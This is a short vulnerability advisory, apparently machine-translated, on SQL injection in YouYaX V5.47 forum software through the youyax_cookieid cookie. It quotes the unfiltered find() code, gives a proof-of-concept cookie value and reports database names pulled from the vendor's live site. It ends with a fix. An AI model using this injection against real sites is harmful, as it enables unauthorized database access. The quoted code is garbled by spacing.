YouYaX_V5.47 SQL Injection Vulnerability)
The problem occurs in the ORG/YouYa. php file. Row 3:
Public function find ($ table, $ ext = "string", $ param) {// search for the substring if (preg_match_all ("/=/", $ param, $ tmp) that matches the given regular expression pattern in param )) {$ SQL = "select * from ". $ table. "where ". $ param; // echo 'x '. $ SQL;} else {$ param = "id = $ param"; $ SQL = "select * from ". $ table. "where ". $ param; // echo 'y '. $ SQL;} $ result = mysql_query ($ SQL); $ num = mysql_num_rows ($ result); if ($ num <= 0) {return false ;} else {$ arr = mysql_fetch_array ($ result); switch ($ ext) {case "number": foreach ($ arr as $ k => $ v) {if (is_string ($ k) {unset ($ arr [$ k]) ;}} break; case "string ": foreach ($ arr as $ k =>$ v) {if (is_numeric ($ k) {unset ($ arr [$ k]) ;}} break ;} return $ arr ;}}
Here, the passed param parameter is not filtered, leading to the risk of SQL injection. Find a place to call the function. The file Lib/ListAction. php contains the following lines in the index method:
if(isset($_COOKIE['youyax_data']) && isset($_COOKIE['youyax_user']) && isset($_COOKIE['youyax_bz'])){ //echo $_COOKIE['youyax_user']; if($this->find(C('db_prefix') . "user", 'string', "user='" . $_COOKIE['youyax_user'] . "' and cookieid='".$_COOKIE['youyax_cookieid']."'")){ $_SESSION['youyax_data'] = $_COOKIE['youyax_data']; $_SESSION['youyax_user'] = $_COOKIE['youyax_user']; $_SESSION['youyax_bz'] = $_COOKIE['youyax_bz']; } }
Here, the find function brings youyax_user and cookieid in the cookie information to the SQL query, which can be controlled by users. Cookieid points have injection problems. POC: PHPSESSID = Taobao; youyax_data = 1; youyax_user = qwerty; youyax_bz = 1; youyax_cookieid = comment 'use the official website http://bbs.youyax.com/for example: SQL error official website database information:
web application technology: Apache 2, PHP 5.3.27back-end DBMS: MySQL 5.0.11available databases [2]:[*] information_schema[*] youyaxco_youyax
The speed is too slow to continue running...
Solution:The find function filters the parameter $ param by using addslashes .....